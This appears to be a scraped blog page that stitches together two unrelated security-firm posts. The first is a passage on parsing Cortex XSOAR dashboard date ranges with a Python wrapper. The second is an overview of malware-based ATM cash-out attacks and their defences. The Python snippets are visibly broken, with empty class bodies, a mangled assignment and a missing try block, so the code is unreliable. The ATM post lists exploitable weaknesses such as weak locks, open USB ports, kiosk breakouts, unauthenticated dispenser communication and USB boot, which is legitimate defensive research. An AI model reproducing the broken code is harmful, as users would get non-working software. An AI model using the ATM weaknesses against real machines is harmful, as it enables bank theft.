At first glance, we identify the two arguments that interest us, “to” and “from”, each containing an ISO 8601 string corresponding respectively to the lower and higher bounds of our selected timeframe.

When we use relative dates, we get still get ISO 8601 strings, However, the “to” argument now holds a default value pointing to January first of year 1.

Dashboard outpout with the date range “Last 6 months”

Finally, when we use the ‘All dates’ date picker, we get two of these arbitrary strings.

Dashboard outpout with the date range “All times”

The findings above can be understood as being a standard on passing dates and time frames, and we can assume that all builtin Cortex XSOAR content can handle it. However, this may not be the case for third party tools. To interface with the latter, and to create our own dashboard compatible content, we need a way to interpret these dashboard parameters.

Objectives redefinition

We have now identified how the dates that define the beginning and the end of a daterange are passed to the elements of a dashboard, after a user selects that date range in the web interface. This opens new capabilities, as we are now not bound anymore to dashboard elements builtin to Cortex XSOAR, but can start to imagine querying period relevant data in third party systems to visualize in our dashboard.

In a future post, we will use our findings to query Microsoft Sentinel for some Incident data, and display the results of that search in dashboards, as well as within incidents. However, a first hurdle will be that not every system we interact with will blindly accept the from and to fields that Cortex XSOAR passes on to us, especially if we get one of those special values. We will first have to come up with a software wrapper that will let us obtain date objects that we can more easily manipulate in Python.

A proposal for interpreting dates in XSOAR

To use the dates stored in our Cortex XSOAR Incidents, and to build our own automation based dashboard widgets, we have come up with an Object Oriented wrapper.
This wrapper introduces classes to describe both these explicit datetimes and their relative counterparts, as well as factories to craft these out of standard XSOAR parameters.

The following snippet describes the different classes:

from abc import ABC

class NitroDate(ABC):

class NitroRegularDate(NitroDate):
    def __init__(self, date: datetime = None): = date

class NitroUnlimitedPastDate(NitroDate):

class NitroUnlimitedFutureDate(NitroDate):

class NitroUndefinedDate(NitroDate):

NitroDate is an empty parent class, with 4 child classes:

  • NitroRegularDate
  • NitroUnlimitedPastDate
  • NitroUnlimitedFutureDate
  • NitroUndefinedDate

NitroRegularDate represents an explicit date, and stores it as a datetime object.

NitroUnlimitedPastDate and NitroUnlimitedFutureDate are both representations of the special date January 1st year 1, but reflect the context they were mentioned in.

NitroUnlimitedPastDate represents that special value having been passed from a “from” argument, such as with the “Up to X days ago” time picker.

NitroUnlimitedFutureDate represents that special value having been passed from a “to” argument, such as with the “From x days ago” time picker.

Finally, NitroUndefinedDate represents either the special value when we cannot identify the argument it was passed from, or the fact that we could not properly parse a date given in input.

Now that we’ve defined the classes we will use to represent our datetimes, we need to build them, preferably from the data supplied by Cortex XSOAR.

from abc import ABC
from datetime import datetime, timezone
from enum import Enum
import dateutil

class NitroDateHint(Enum):
    Future = 1
    Past = 2
# an Enum used as a flag for functions that build NitroDates

class NitroDateFactory(ABC):
    """this class is a factory, as in it's able to generate NitroDates from a variety of initial arguments"""
    def from_iso_8601_string(cls, arg: str = ""):
        this function is able to create a NitroDate from an iso 8601 datestring
        :param arg: the iso 8601 string
        :type arg: str
            date = dateutil.parser.isoparse(arg)
        except Exception as e:
            raise NitroDateParsingError from e
        return NitroRegularDate(date=date)

    def from_regular_xsoar_date_range_arg(cls, arg: str = "", hint: NitroDateHint = None):
        this function is able to create a NitroDate from a single argument passed by
        a xsoar GUI element and a Hint
        :param arg: the iso 8601 string or cheatlike string
        :type arg: str
        :param hint: a hint to know whether the date, if a predetermined value, should be interpreted as future or past
        :type hint: NitroDateHint
        if arg == "0001-01-01T00:00:00Z":
            if hint is None:
                return NitroUndefinedDate()
            elif hint == NitroDateHint.Future:
                return NitroUnlimitedFutureDate()
            elif hint == NitroDateHint.Past:
                return NitroUnlimitedPastDate()
            return cls.from_iso_8601_string(arg=arg)

    def from_regular_xsoar_date_range_args(cls, the_args: dict) -> (NitroDate, NitroDate):
        this function is able to create NitroDates from the two arguments passed by
        a xsoar GUI element
        :param the_args: the args passed to the xsoar automation by the timepicker GUI element
        :type the_args: dict
        ret = [NitroUndefinedDate(), NitroUndefinedDate()]
        if isinstance(the_args, dict):
            for word, i, hint in [("from", 0, NitroDateHint.Past), ("to", 1, NitroDateHint.Future)]:
                if isinstance(tmp := the_args.get(word, None), str):
                    nitro_date = cls.from_regular_xsoar_date_range_arg(arg=tmp, hint=hint)
                    # print(f"arg={tmp}, hint={hint}, date={nitro_date}")
                    if isinstance(nitro_date, NitroDate):
                        ret[i] = nitro_date
        return ret

The Factory presented above eases work during the development of a dashboard widget, by allowing to get two NitroDates with this simple call

FromDate, ToDate = NitroDateFactory.from_regular_xsoar_date_range_args(demisto.args())

The following screenshot demonstrates the use of this factory function and the type and value of it’s outputs when run against Cortex XSOAR data

Screenshot of PyCharm showcasing the use of from_regular_date_range_args

From there on, we can check the type of FromDate and ToDate and more easily build logic to query third party systems. At that stage, the wrapper correctly identifies the datetimes and timeframes, which it returns as standardized python objects, whether they were passed down in a function call or stored in an incident, and is able to detect errors in their formatting.

In a future post, we use this mechanism to query external APIs in a Cortex XSOAR dashboard.


NVISO Github Repository

ISO 8601

XSOAR documentation on automations

XSOAR – add a widget to a dashboard

XSOAR – creating a widget automation

About the author

Benjamin Danjoux

Benjamin is a senior engineer in NVISO’s SOAR engineering team.
As the SOAR engineering design lead, he is responsible for the overall architecture and organization of the automated workflows running on Palo Alto Cortex XSOAR, which enables the NVISO SOC analysts to detect attackers in customer environments.

Malware-based attacks on ATMs – A summary


Today we will take a first look at malware-based attacks on ATMs in general, while future articles will go into more detail on the individual subtopics.

ATMs have been robbed by criminal gangs around the world for decades. A successful approach since ~ 20 years is the use of highly flammable gas, which is fed into the ATM safe and ignited during a robbery. For an attacker, this is an inexpensive way to get the cash, but it also leads to great publicity and thus risk of being caught by security authorities. In addition, more and more vending machines are being equipped with systems that ink the money as soon as the machine is physically breached.

Since the beginning of the 2010s, there has been a trend for more and more criminal gangs to switch to non-violent methods without explosives. We are talking about so-called physical malware attacks. Here, malicious software is brought onto the PC inside the ATM, for example, via a USB stick. This malware-based attack usually results in all cash inside the safe being ejected via the regular dispensing mechanism (cash-out attack). A successful attack would effectively put the malware in full command over the ATM thereby rendering it almost impossible to stop them.

Another aspect that cannot be ignored is that an infected ATM often enables attacks on other devices or services within the network. For example, for research and testing purposes, we were able to develop a malware that attacked all ATMs within the network from an infected device (initial ATM). The result was simultaneous cash withdrawal from all ATMs within the shared network. It was also interesting here that other devices such as a Raspberry Pi connected to the same network could achieve the same results as well.

Even though during the Covid pandemic in 2020 such malware-based attacks on ATMs decreased, a clear increase has been visible since the beginning of 2022. Malware to attack specific types of devices can be purchased today for about 1000USD within the darknet.

To protect against such attacks, it is necessary to prevent malware from being installed and executed. Through years of research and experience in real projects, we have been able to help ATM manufacturers and banks protect their devices from such attacks.

ATM Internals

Generally, an ATM consists of two components:


  • Includes:
    • Cash dispenser
    • Cassettes containing banknotes
  • Strongly protected by heavy locks and armored walls


  • Includes the computer connected to other devices:
    • Card reader
    • Pin pad
    • Touch screen
    • Network components
    • etc.
  • Mostly weakly protected from physical attack.
    • Unarmored: Door and walls are often made of thin plastic or sheet metal.Poor quality locks: locks are often no better than those on private mailboxes, which can be opened in seconds with a lockpick.
    • Often only one key for several ATMs is used.

The computer inside the cabinet usually runs on the Windows operating system, which in turn runs the application for legitimate use of the ATM. A user / bank customer should not be able to break out of this application (e.g. via the touchscreen) to access the underlying system. For this purpose, Windows generally runs in the so-called Kiosk mode, which limits the input options only to the necessary user functions within the application.

Input values within the user application via the touchscreen or pin pad, for example, are in turn processed by the software and then transmitted to other devices such as the cash dispenser via corresponding commands. This communication between the user application and internal devices takes place via the XFS standard (Extensions for Financial Services). This standard provides an interface (API) for the Windows Hardware Manager via which all applications can access it.

When the user initiates a transaction such as a cash withdrawal, the bank’s processing center is also contacted, which validates the transaction and ultimately transmits the confirmation for withdrawal. The connection between the ATM and the processing center is generally made via a cable, but occasionally also wirelessly (WiFi or GSM).

Overview ATM internals

Overview ATM

Vulnerabilities to ATM malware

In general, we classify ATM vulnerabilities regarding malware attacks into three categories. The combination of vulnerabilities from these categories allows an attacker to dispense all cash or attack other systems on the same network in many cases.

Insufficient physical security

The first step for malware-based attacks is usually to open the cabinet in order to interact with the integrated computer via a plugged-in keyboard or special USB stick. Here, we came into contact with recurring security vulnerabilities in various assessments:

  • The lock of the cabinet is insecure and can be opened with a lockpick within seconds.
  • The housing (door and walls) are made of thin plastic or sheet metal and can be destroyed with minor effort.
  • Locks from different ATMs can be opened with the same key. If an attacker obtains such a master key, they can often open all the ATMs in different branches.
  • The keys are not secure against copying. If an attacker obtains a key, it can be copied as often as desired.
  • Lack of security for e.g. USB interfaces. If an attacker succeeds in opening the cabinet, they will in almost all cases find unprotected (open) USB interfaces that allow interaction via keyboard.
Computer inside the cabinet with open USB port

Computer inside the cabinet with open USB ports

Insufficient configuration of the system and peripheral devices

It is often the case that the XFS standard for communication between OS and peripherals is configured very insecurely. There is often no authentication at all between the peripherals and the OS. An attacker with access to the computer could execute malware to communicate with the cash dispenser, and thus cash-out all available money. In summary, we found the following recurring security flaws in the system and device configurations:

  • Insufficient or even missing authentication between USB peripherals and the OS which would allow so called ATM black-box attacks.
  • Lack of communication encryption between OS and peripherals. An attacker can thus often read sensitive card data and transactions of the user.
  • Lack of hard disk encryption. An attacker can extract and read any hard disk content. In addition to various software that can be misused to further develop malware, we were also able to extract unencrypted videos and pictures of customers that were taken via the camera integrated in the ATM.
  • Inadequate protection of the kiosk mode. If an attacker manages to open the cabinet and plug in a keyboard, they can often break out of the banking application using special keyboard shortcuts and thus access the underlying Windows system. However, in some cases this is also possible via the touch screen of the machine without having to open the cabinet.
  • Boot from external storage media. ATMs are occasionally configured to boot from an attached storage medium such as a USB stick when they are restarted. If an attacker can boot into an alternative system in this way, hard disk contents can be completely extracted or even communicate directly with peripherals such as the cash dispenser.
  • Inadequate or missing application control configuration. Today’s malware or public enumeration tools are often executed via Powershell scripts or exe files. In many of our assessments, the case was that the execution of such software was insufficiently blocked or not blocked at all.
  • Weak or missing AV solutions. The installation and execution of tools and malware is not or often insufficiently detected because weak AV software are used for protection or these are not up to date.

ATM allows breaking out of the banking application using a connected keyboard, exposing that the current user has full administrative access.

Insufficient network security

An attacker with access to the ATM’s network interface (e.g. Ethernet) can attack other systems or services within the network. In one of our scenarios, it was even possible to dispense cash from all ATMs within the network. In general, such scenarios are based on the following vulnerabilities:

  • Lack of or insufficient network access control. An attacker who has been able to connect to the ATM network via Ethernet often has full authorization to communicate with other systems on the same network. In many cases, infiltration of other devices or even the Active Directory is possible.
  • Unencrypted communication to the backend. An attacker in a man-in-the-middle position between the processing center and the ATM can read sensitive transaction data, but also manipulate it to issue malformed funds.
  • Lack of or insufficient authentication to the exposed ATM network service. Often, own (spoofed) backend commands can be sent to the exposed ATM service to make it cash out.
Example - Bypassing outdated NAC (Network Access Control) with public tools

Example – Bypassing outdated NAC (Network Access Control) with public tools

Attack Scenarios

Due to the large number of possible vulnerabilities, individual malware-based attack scenarios often arise. The following figure shows general attack scenarios, which are also performed in our assessments.

Overview - Attack scenarios


In general, it is difficult to make all-encompassing recommendations for securing ATMs. Even in our current assessments, we are increasingly confronted with new and very individual security vulnerabilities. However, we can make general recommendations for securing ATMs against malware attacks, as some vulnerabilities are present on a regular basis:

  • The computer should be in the safe. Securing the computer in the safe would probably be the best possible protection against malware-based attacks. Unfortunately, we could not detect such a protection in any of our analyses so far.
  • If it is not possible to place the computer in the safe:
    • The cabinet housing and door should also be made of solid material. It should not be possible to open the lock of the cabinet using a lockpick. Generally, security locks or even digital locks with proper auditing possibilities should be used here. The cabinet of each ATM should only be able to be opened with an individual key.
    • Network devices such as switches should not be placed outside the ATM.
  • All communication between ATM and backend should be encrypted according to current standards.
  • All transactions between the ATM and the backend should be mutually authenticated for example using TLS mutual authentication.
  • All unused services exposed by the ATM should be turned off.
  • The firewall between the ATM and backend should be configured to allow remote access only to the service that is needed. All network services that are not needed should be turned off.
  • Remote access should follow strict password policies or even better: key-based authentication mechanisms.
  • Any communication between the OS and peripherals such as the cash dispenser should be encrypted. Here the ATM vendor can be consulted since it is usually a simple configuration that can be enabled.
  • The OS as well as used applications should be updated regularly including hotfixes.
  • It should not be possible to connect any peripheral (e.g. keyboard) to the computer and use it. One possibility would be to use local OS policies or third-party software to allow only explicit devices. However, one should be careful with such whitelisting, as the device IDs themselves can be spoofed.
  • The execution of scripts or other software should be limited as much as possible and be restricted to only what is necessary. One possibility would be the use of Windows Applocker.
  • Any software that is not needed (e.g. software used for development) should be removed.
  • Hard disks should be fully encrypted.
  • Access to the BIOS should be protected by e.g. setting a strong password.
  • A boot from the hard disk of the ATM should be forced. It should not be possible to access the boot menu without authentication. In addition make sure to enable measured boot.
  • AV solutions should be used and regularly updated. In general, we prefer the use of Windows Defender over third-party software.
  • Abnormal behavior or communication regarding network but also peripherals should be logged and alarms triggered.


Malware-based attacks that rely on physical access are becoming increasingly popular. Today, however, we can already see some security improvements in current assessments. However, our experience shows that the improvement within the last years is still insufficient. Many protections could still be circumvented to exploit initial vulnerabilities. This is usually not because manufacturers and banks deliberately avoid security precautions, but because the whole environment and its processes often do not allow simple security upgrades. Some examples are that to ensure proper network access control (NAC), all switches within all branches would have to be replaced, technical staff still needs an interface (e.g. USB) to perform administrative tasks on the ATM, etc.

In general, it turns out that criminal hacker gangs are always one step ahead and find ways to bypass current security measurements.

About the Author

Alexander Poth

Alexander is a senior security consultant at NVISO. He regularly performs a variety of assessments, including IoT and embedded devices, Web and Mobile applications.